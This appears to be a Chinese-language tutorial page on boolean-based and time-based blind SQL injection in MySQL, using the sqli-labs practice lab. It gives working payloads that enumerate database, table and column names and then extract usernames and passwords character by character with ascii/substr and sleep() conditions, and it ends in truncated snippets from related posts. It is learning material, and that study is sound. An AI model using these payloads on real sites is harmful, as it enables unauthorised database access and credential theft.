布林型盲注核心思想: 利用判斷語句杢證明推測是否正確。 推測正確時,頁面正常顯示;錯誤時,頁面異常。
盲注的一般步驟:
1、求閉合字元;2、求當前資料庫名的長度;3、求當前資料庫名對應的ascii值;4、求表的數量;5、求表名的長度;6、求表名對應的ascii值;7、求列的數量;8、求列名的長度;9、求列名對應的ascii值;10、求字段的數量;11、求欄位內容的長度;12、求欄位內容對應的ascii值。
求資料庫的長度 ?id=1' and length(database())=8 %23
求資料庫名ascii值 ?id=1' and ascii(substr(database(),1,1))=115 %23
求表的數量 id=1' and (select count(table_name) from information_schema.tables where table_schema='security') = 4 %23
求表名的ascii值 id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101 %23
求列的數量 id=1' and (select count(column_name) from information_schema.columns where table_schema='security' and table_name='users')=3 %23
求列名的ascii值 id=1' and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name = 'users' limit 0,1),1,1))=105 %23
求字段的數量 id=1' and (select count(username) from security.users)=13 %23
求欄位內容 id=1' and ascii(substr((select concat(username,0x23,password) from security.users limit 0,1),1,1))=68 %23
時間型盲注 特點:頁面不存在異常,且即無回顯也無報錯資訊 利用:只能利用條件語句結合執行時間的長短杢判斷payload是否正確
後台**:
select id, username,password from users where id = '$id' limit 0,1;
輸入id:1' and if(length(database())>10,sleep(0),sleep(5)) %23
select id, username,password from users where id = '1' and if(length(database())>10,sleep(0),sleep(5)) %23' limit 0,1;
等同:輸入id:1' and sleep(if(length(database())>10,0,5)) %23
SQL盲注 時間盲注,dnslog盲注
時間盲注原理 id get id sql select from users where id id limit 0,1 result mysql query sql row mysql fetch array result if row else 存在sql注入漏洞 然而頁面不會回顯資料,也不會回...
布林盲注手注
布林盲注 mid str,1,3 字串擷取 意思就是把str這個字串從第乙個字串開始,擷取前三個顯示 substr 這個函式和上面的用法一樣,也是用來擷取字串的 ord 轉換成ascii碼 length 統計長度 version 是檢視資料庫版本 database 檢視當前資料庫名 user 檢視當...
布林盲注 原理
布林盲注 可以寫指令碼 例如 沒有錯誤提示 也沒有回顯 但是輸入錯誤的話頁面會有反應 也就是說 只有 true 和false 例如 sql labs less 7 它只有兩種提示 所以可以用布林盲注 playload and length database 8 判斷資料庫名長度 是否等於8 如果不等...